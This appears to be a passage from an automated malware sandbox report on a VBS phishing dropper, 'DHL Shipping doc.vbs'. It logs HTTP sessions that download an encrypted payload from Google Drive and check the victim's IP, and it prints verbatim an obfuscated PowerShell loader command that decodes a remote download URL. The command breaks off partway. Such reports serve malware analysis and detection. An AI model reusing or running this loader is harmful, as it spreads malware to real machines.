                                                      2024-04-24 04:48:54 UTC1255INData Raw: 36 65 72 76 6b 79 57 35 69 48 70 41 31 65 78 6b 4d 5a 71 67 73 79 57 77 48 44 62 38 39 57 50 6e 4c 79 52 43 33 43 69 42 51 72 38 57 50 78 58 78 4b 71 72 72 65 79 52 69 57 79 71 6f 70 52 58 45 52 71 54 2b 73 42 69 6e 43 77 6a 44 39 37 67 79 73 41 57 51 72 73 2f 57 61 41 4f 41 6b 73 67 45 4a 59 75 73 4d 46 4c 53 36 56 33 37 32 4d 67 45 49 6b 41 4b 44 58 4c 52 36 57 45 49 52 53 56 69 38 6c 4f 41 69 38 4d 65 62 4a 7a 61 71 72 4d 53 76 30 50 42 53 47 62 62 4d 52 7a 38 56 7a 67 4d 43 57 38 49 34 72 50 4e 57 61 4b 42 6e 30 32 34 31 33 56 6c 75 53 6c 46 2b 48 75 65 6d 35 2f 34 74 5a 67 44 6c 63 39 56 52 55 6c 36 50 76 42 6a 36 73 33 77 47 7a 72 4e 38 42 73 36 7a 66 41 62 50 76 6c 54 4d 6b 66 50 52 77 34 6b 53 32 61 72 65 73 6a 62 73 68 65 4a 52 2f 4d 6c 37 50 4e
                                                      Data Ascii: 6ervkyW5iHpA1exkMZqgsyWwHDb89WPnLyRC3CiBQr8WPxXxKqrreyRiWyqopRXERqT+sBinCwjD97gysAWQrs/WaAOAksgEJYusMFLS6V372MgEIkAKDXLR6WEIRSVi8lOAi8MebJzaqrMSv0PBSGbbMRz8VzgMCW8I4rPNWaKBn02413VluSlF+Huem5/4tZgDlc9VRUl6PvBj6s3wGzrN8Bs6zfAbPvlTMkfPRw4kS2aresjbsheJR/Ml7PN


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.449738142.251.2.1394432668C:\Program Files (x86)\Windows Mail\wab.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-24 04:49:34 UTC216OUTGET /uc?export=download&id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      2024-04-24 04:49:35 UTC1582INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Wed, 24 Apr 2024 04:49:34 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-lYCQJx7Q-I2mQ-s3-b0f5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.449739142.251.2.1324432668C:\Program Files (x86)\Windows Mail\wab.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-24 04:49:35 UTC258OUTGET /download?id=1GFtH2KO7xztBakHz0a-faxdoW0utL33g&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      2024-04-24 04:49:36 UTC4751INHTTP/1.1 200 OK
                                                      X-GUploader-UploadID: ABPtcPqv3diKXYeyVl08YGlJdFDMf70y-4h2PrMZJnVfzvuRJhXsqxU7UqnHE7CyHjxaC2_-uQ
                                                      Content-Type: application/octet-stream
                                                      Content-Security-Policy: sandbox
                                                      Content-Security-Policy: default-src 'none'
                                                      Content-Security-Policy: frame-ancestors 'none'
                                                      X-Content-Security-Policy: sandbox
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Cross-Origin-Embedder-Policy: require-corp
                                                      Cross-Origin-Resource-Policy: same-site
                                                      X-Content-Type-Options: nosniff
                                                      Content-Disposition: attachment; filename="PDOaqsEvftIXqv31.bin"
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: false
                                                      Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                                      Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                      Accept-Ranges: bytes
                                                      Content-Length: 242752
                                                      Last-Modified: Wed, 24 Apr 2024 00:13:42 GMT
                                                      Date: Wed, 24 Apr 2024 04:49:36 GMT
                                                      Expires: Wed, 24 Apr 2024 04:49:36 GMT
                                                      Cache-Control: private, max-age=0
                                                      X-Goog-Hash: crc32c=7OS78w==
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close
                                                      2024-04-24 04:49:36 UTC4751INData Raw: ad ee 65 f6 d5 1d dd 74 57 87 23 46 e6 5c e2 2f 2a c2 d9 b7 2e df 95 50 3d d7 68 a8 03 84 16 bd 86 2d 64 a3 9f 2c 05 e8 83 0f 27 62 f6 f7 98 9b ec 8b f4 bf f6 32 8c ed ad 8c 91 94 ed 66 36 3b c3 7e 38 76 31 8f d5 33 e2 64 e2 c8 0d 18 e1 4d cd 19 f5 47 ea 02 e1 43 bb 84 05 2b ba dc 1f 7f da 28 dd 74 ac 8f 0d ff 55 e0 48 7a c7 4e 6a 12 8e 3d 6e b7 08 7e a5 35 37 61 01 99 9f 6d 9a 5c 56 d7 93 64 d4 b4 bc c1 5d 3e 5d 4a 45 3a 6a 7b c8 d5 29 10 50 e0 44 ff cc 52 20 5e e9 99 11 3d 6c 86 2a 5c f7 75 d4 4a 03 34 f9 c0 b3 90 b2 15 c5 3e 44 73 63 43 4f 11 9d 93 b8 c9 67 0c b4 df 8d 68 67 ac 72 c3 dd b3 22 65 65 3f 5c db a7 62 48 72 4e c9 9b 5a 6d b9 0e 96 36 13 bb 8b c0 08 92 66 bc 8c 83 21 42 71 2d a1 a8 6f f3 a0 38 f2 07 5a 5f a0 6f 06 da dc 2b 95 da a5 23 32 47
                                                      Data Ascii: etW#F\/*.P=h-d,'b2f6;~8v13dMGC+(tUHzNj=n~57am\Vd]>]JE:j{)PDR ^=l*\uJ4>DscCOghgr"ee?\bHrNZm6f!Bq-o8Z_o+#2G
                                                      2024-04-24 04:49:36 UTC4751INData Raw: 7c 29 ae 03 42 5e 28 0b 15 52 15 e6 f0 a1 41 c4 e2 e1 10 a4 2f ef ab d9 90 73 27 c6 78 e5 1e 7b 49 f0 22 ba 28 4b 14 3d 01 f3 87 c2 61 03 a1 91 ac 8e 4e 79 7c fe 0c 81 c8 a9 1b 29 ad e1 5d 96 d3 cb 3c 52 08 e0 a5 b2 6f 86 21 45 d5 c8 d1 0a 0c 97 c8 b8 46 a4 12 1f da 57 1c 67 0e f2 32 f5 bc 8a 60 36 f5 26 f5 ac e6 83 5c 63 6c 2d 8f 23 67 72 58 d5 b5 0b 1c 8f a6 3c 5c e2 ae 38 51 49 5f ea f8 e2 d8 05 b7 99 98 c0 41 59 25 9a 5d 2a fc 71 84 cd 7e a4 89 0d 04 21 da e0 ad 17 55 6b 8a 21 66 a6 e1 64 35 cb 74 9c 7b 74 ea 96 de 7d 76 a1 d5 dc 36 ee 1b 2b 14 ea 69 1b 7c 54 1c 83 47 11 08 68 91 fc 3d 6f 5e 92 e3 77 35 80 5b 3e 0d 92 6f d2 5e f5 4c d9 45 07 ce 48 d0 74 70 26 d3 27 ff aa 0f 5c 9c 65 0d 51 94 95 60 a0 cd a8 99 b7 e7 22 34 6a b5 53 ed e6 05 0a bf 97 d3
                                                      Data Ascii: |)B^(RA/s'x{I"(K=aNy|)]<Ro!EFWg2`6&\cl-#grX<\8QI_AY%]*q~!Uk!fd5t{t}v6+i|TGh=o^w5[>o^LEHtp&'\eQ`"4jS
                                                      2024-04-24 04:49:36 UTC444INData Raw: 30 56 d2 d6 c9 00 11 b3 ed 15 bc 6e ad fb 37 b2 e2 b6 8c dc 4f 6e b2 6c 64 0a 8e 41 e9 5b cf 79 87 0e b4 b5 b1 e6 2d 05 59 01 ab 19 f7 5d d4 57 4f d1 e3 76 61 91 0e fc 29 02 cf 5c e7 78 1e 57 d9 27 3e b1 13 76 9a e2 7b 28 52 eb d0 0b f7 21 06 42 89 b7 19 3a bd 98 22 ca 1a d9 f1 11 ba 2c dc d9 32 34 fd 7a 4b d8 ca 62 3d 1b e2 a4 97 e9 60 11 77 1f 12 e1 a6 5d 27 15 8e 38 ea 34 46 30 c6 87 8a 54 f1 61 71 16 62 62 7e 60 d1 52 df e5 98 e4 31 18 7f c9 78 a7 cd 89 ca bc 6d 7e f7 89 b4 34 1a 22 2a 76 bc 3d 9d 76 b3 d4 4d 52 62 5d f6 19 5c c6 16 60 df 30 ee 6a d2 04 9d 3b 3d 3a ab 65 4c 0f d8 d1 5d 95 68 9d 29 14 ee 87 ab b2 65 2f bf fd d7 6f 20 11 0b 3f 88 92 e9 4c d0 57 a8 e5 b7 7a aa 84 da a6 76 32 af cb 33 e6 64 1c c6 fe e7 e1 b3 79 15 f5 67 f3 02 e1 43 05 85
                                                      Data Ascii: 0Vn7OnldA[y-Y]WOva)\xW'>v{(R!B:",24zKb=`w]'84F0Taqbb~`R1xm~4"*v=vMRb]\`0j;=:eL]h)e/o ?LWzv23dygC
                                                      2024-04-24 04:49:36 UTC1255INData Raw: a8 77 17 3f e0 06 51 3c 6d 5f 62 8f f5 59 69 39 34 ca 42 9b 6b e0 77 c6 80 68 7a cd 06 2d a7 92 12 59 bf 62 57 d2 2d 9f 93 87 76 1b 73 43 a1 e4 5f 17 88 7d e8 33 83 e9 8b f9 33 c8 7f d2 7a 3c 56 2c 76 23 92 0f 9a 01 f6 70 f0 f2 a7 e7 7c 94 2a af 80 3b ee 1f 20 e4 ab ea 25 ac df 57 b8 7a 80 86 dc 9a 38 ff 1e 48 6b c3 72 7e 99 8c 77 a6 c4 26 11 47 ba 1b e7 f0 3e 38 a4 82 00 47 1f 85 66 ad 0f 19 4d 73 a9 9c 68 8d b2 74 65 c2 07 6b fd 48 f5 51 6f 3f aa e2 d3 96 3e 46 99 fa 04 7f bd fc bc 43 59 a3 a2 a9 27 d5 ea 68 85 c5 f0 50 93 12 3f 66 43 e0 63 99 f0 7c 26 03 9d 57 80 5b 73 05 78 4e d6 84 5b 22 43 c0 67 4f 3f d1 f7 6a f6 c8 e9 f6 b8 d9 d2 66 73 9a 82 65 99 54 ab 1f 40 d2 c9 31 d1 63 30 ae 4e a0 8f 7e 5b 8a 35 07 dc 19 a0 53 20 e1 c2 f8 85 7c a7 01 87 24 c0
                                                      Data Ascii: w?Q<m_bYi94Bkwhz-YbW-vsC_}33z<V,v#p|*; %Wz8Hkr~w&G>8GfMshtekHQo?>FCY'hP?fCc|&W[sxN["CgO?jfseT@1c0N~[5S |$
                                                      2024-04-24 04:49:36 UTC68INData Raw: 3f 00 c3 84 f7 7f 72 18 a6 48 39 29 06 98 2e 23 5d 97 e0 d7 de e1 35 a8 af 2e 16 4d 4e bc 17 b9 93 98 c8 67 0c b4 21 dc 14 62 ac 3e c2 e6 b6 db 28 4d 61 96 24 58 9d 60 55 4e c9 7d 34 91 b1 05 97 57 ed b9
                                                      Data Ascii: ?rH9).#]5.MNg!b>(Ma$X`UN}4W
                                                      2024-04-24 04:49:36 UTC1255INData Raw: 0b c3 08 89 5e be 8c ef 21 42 71 9b 68 ab 7e d3 80 38 f2 07 44 52 a1 6f 3e ab dc 2b b5 da 5b 2f 31 47 ac f9 b3 9a a5 96 67 93 21 9e 67 ab a5 15 76 cb 81 d6 11 a5 9f 1a 57 f9 aa 76 17 3f f6 06 51 3c 6d 50 57 8a f5 a7 65 0d 31 ea 47 9b 53 2a 76 38 46 56 29 cd 06 d9 83 b9 12 71 fe 3b a9 d6 d3 91 44 88 56 1d 73 65 81 1a 51 1b 88 83 18 3f 8f 34 ab da 33 c8 81 20 7b 05 72 2d 66 23 86 f1 94 45 f6 44 8c f2 a8 e6 82 9a 27 bc b0 c7 e2 8e 20 c4 8a eb 25 ac 30 76 81 6c 80 86 22 6a 34 f6 26 58 23 c3 72 74 99 8e 77 a6 c4 06 11 47 ba 1b e8 c5 2a 38 5a 8e 24 13 3f 86 6c de 5a e7 4c 40 c9 bc 6b 8d 4c 78 99 cc f9 67 fc b6 96 18 6f 1f a1 1c dd 95 c0 67 a4 e2 04 7f 43 8d ea 43 59 59 86 80 27 f5 ea 52 ba c5 0e 51 8a 56 3f 66 43 e0 61 93 f0 39 d5 0f 9d 57 d5 a5 8c fa 9f 4d 28
                                                      Data Ascii: ^!Bqh~8DRo>+[/1Gg!gvWv?Q<mPWe1GS*v8FV)q;DVseQ?43 {r-f#ED' %0vl"j4&X#rtwG*8Z$?lZL@kLxgogCCYY'RQV?fCa9WM(
                                                      2024-04-24 04:49:36 UTC1255INData Raw: 81 d6 29 dd 5c af 8f 0d d4 ab ee 48 7a e7 4b 6a 12 8e c3 60 b4 08 7e 5b 39 34 61 21 9c 1f 6d 9a a2 59 f1 3f 6a d4 00 4b 00 7c 86 a2 0a 89 1b 7e 09 a1 a6 09 40 24 8f 23 8d 53 31 03 3d 88 09 73 51 18 86 4a 39 d7 07 5f 25 1a 4c 97 e0 f7 21 ed 35 a8 af 2e 17 4d 6e 41 1b b9 93 46 c7 64 0c b4 21 d1 2e 67 8c 3f c2 de b3 25 29 74 4f 5c db a7 9c 41 72 4e b2 1f 5a 6f bc fb 99 3d 13 9b 23 c3 08 92 90 b2 8f 83 21 bc 7d 90 68 8b 6c f3 80 38 0c 06 83 43 a0 6f 06 64 d0 2a b5 24 ac 22 30 6f d4 f9 b3 90 d1 7b 66 aa 29 60 69 a9 a5 15 73 cb 81 d6 11 a5 9d 1a 57 f9 aa 74 17 3f f7 06 51 3c 6d 50 57 85 f5 a7 65 35 14 eb 47 9b 6b 1e 87 c4 b9 7e 84 c1 05 d3 8b 97 12 71 f8 9c 56 e1 d6 91 99 87 6e 18 73 43 a1 22 a7 e5 77 82 3c 3f 8f e9 b8 ea 37 c8 38 2e 7b 05 53 2c 76 32 a6 f1 94
                                                      Data Ascii: )\HzKj`~[94a!mY?jK|~@$#S1=sQJ9_%L!5.MnAFd!.g?%)tO\ArNZo=#!}hl8Cod*$"0o{f)`isWt?Q<mPWe5Gk~qVnsC"w<?78.{S,v2
                                                      2024-04-24 04:49:36 UTC1255INData Raw: 71 1a 62 62 70 60 d1 52 df e5 98 f5 31 18 7f 37 54 a2 cd a1 8a 42 63 74 7b c8 4a 38 1b dc 04 75 bc 1d 92 88 b2 ed b6 5c 6e 5d ce e2 50 ca 16 78 ad cf 11 95 06 0e 94 0b 3d 41 ab 4d 7c 0e d8 db b2 b9 6f 9d 46 55 10 89 a1 92 5c 1e bf fd 5a 2d de 1d 0a c1 a6 99 e9 b2 dc a2 a9 b3 ff 7a aa 8e 24 88 77 32 8f d5 cd e8 64 e2 c8 0c eb e1 4d 55 18 f5 47 ea fc e0 7a fe 84 05 2b 82 d9 1f 7f da 10 17 8b 53 70 f3 f6 55 e0 33 1c c7 4e 6e 6c d8 3d 6e bd 20 23 a5 35 3d 58 0e 99 1f 6d 64 55 58 c8 52 0c d4 00 b1 24 49 86 5c 00 ae c6 34 13 a1 a6 f7 69 22 8f 0b d3 ad 3f 0a e1 a2 f7 7e 42 18 a6 4a 39 93 07 8d 54 23 57 97 e0 f7 df e2 05 ab 51 8c 16 4d 4e 42 1b b9 93 ba ba 74 0c b4 d5 a0 58 67 ac 3a c0 ac c6 d9 28 3d 24 26 db a7 66 4a 5a 5d c9 7b 50 6d cb 2f 97 3d 15 c6 50 c3 08
                                                      Data Ascii: qbbp`R17TBct{J8u\n]Px=AM|oFU\Z-z$w2dMUGz+SpU3Nnl=n #5=XmdUXR$I\4i"?~BJ9T#WQMNBtXg:(=$&fJZ]{Pm/=P
                                                      2024-04-24 04:49:36 UTC1255INData Raw: 53 84 bc 6e a9 a9 7d b1 e2 c6 5a ec 4d 6e b8 12 48 08 8e 65 9a 17 cc 79 09 27 b3 a2 b1 ec ad da 50 01 af 43 92 5f d4 21 b2 84 e3 76 61 c3 79 fe 29 72 b1 71 e5 78 1a db 25 26 3e e1 97 52 9a e2 81 5b 6b f9 d0 7b 77 fa 0a 42 8d b6 7c 3e bd e2 5c e2 1b d9 d5 66 ba 28 dc 57 bc 11 fd 7a b1 fe c8 62 0e 2b e6 a4 84 11 61 28 7a 1f 12 f0 86 7d 26 15 8e c6 1a 36 44 08 3d 7c 86 56 f1 bf 7a 1a 62 42 8e 61 e8 57 21 e4 a1 c7 34 18 7f 37 4c 1a 33 5e 75 a8 47 74 68 f8 b0 34 35 de 24 76 b3 1d 92 67 93 d4 b3 5c 6e a3 f8 e5 50 f2 0c 42 c2 30 ee 94 20 07 a4 29 3a 3a ab 4d 82 0e e1 c0 a3 99 6f 63 4f 55 ee 79 a8 92 64 54 c9 fd 5a 29 5d 68 0a c1 82 b9 e1 b2 dc 5c 56 84 f7 7a aa 70 28 aa 76 12 8e d5 33 e6 9a e3 f1 d7 e7 e1 4d 8b 10 f5 47 91 7b e1 43 ff 7a 0c 2b ba a7 69 7f da 2c
                                                      Data Ascii: Sn}ZMnHey'PC_!vay)rqx%&>R[k{wB|>\f(Wzb+a(z}&6D=|VzbBaW!47L3^uGth45$vg\nPB0 )::MocOUydTZ)]h\Vzp(v3MG{Cz+i,
                                                      2024-04-24 04:49:36 UTC1255INData Raw: 0a 7d 78 a6 d1 b4 5b 5c a2 28 70 2e d3 27 75 dd 9c 2f 36 cf a8 8c 4e a3 ea 14 98 02 3b 9d 7c bf 72 37 1f 21 a2 ae 54 8a e5 3e 04 ee 2c e8 01 03 f8 b9 bf 62 55 bf eb 66 e2 b0 2f 5c 40 4d 49 f2 f1 a5 17 bf 96 fa b6 2a ab 11 1d ce 30 01 1a 6c d6 60 80 09 d4 2f b1 5a 3c dd 5d 81 b6 11 0e 12 39 2d 7e f1 42 eb a0 7e 10 ea 63 64 95 02 bc 71 ee a4 0b 8b 8f 09 30 56 f6 b9 0d 03 11 3d 6c 33 b6 6e a9 89 51 91 fc c6 a4 e2 b1 60 b8 ec 44 f4 82 45 9b 37 f3 79 f7 26 74 b4 88 fb ad 24 59 ff a6 6a 82 7f a5 27 cf f3 a3 6b 9b 1c 84 de 69 72 4f 7f 19 76 1a 25 29 da 32 c1 93 72 ae e2 7f 5a ac ee e9 59 77 04 06 bc 84 c5 15 1b c6 9c a2 ec 1e ab 6f 67 ba 58 f4 b2 b2 13 f7 07 3b f2 ca 66 0e 1e e6 a4 84 11 6e 11 70 1f ec fc 86 5d 07 2e 8e c6 e4 c6 47 31 37 82 8a 54 db bf 41 1a 62
                                                      Data Ascii: }x[\(p.'u/6N;|r7!T>,bUf/\@MI*0l`/Z<]9-~B~cdq0V=l3nQ`DE7y&t$Yj'kirOv%)2rZYwogX;fnp].G17TAb


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.449740104.26.13.2054432668C:\Program Files (x86)\Windows Mail\wab.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-24 04:49:38 UTC155OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2024-04-24 04:49:38 UTC211INHTTP/1.1 200 OK
                                                      Date: Wed, 24 Apr 2024 04:49:38 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 13
                                                      Connection: close
                                                      Vary: Origin
                                                      CF-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 879377c83c0328f9-LAX
                                                      2024-04-24 04:49:38 UTC13INData Raw: 31 35 34 2e 31 36 2e 31 30 35 2e 33 36
                                                      Data Ascii: 154.16.105.36


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:06:48:48
                                                      Start date:24/04/2024
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL Shipping doc.vbs"
                                                      Imagebase:0x7ff6fc6f0000
                                                      File size:170'496 bytes
                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:1
                                                      Start time:06:48:48
                                                      Start date:24/04/2024
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l 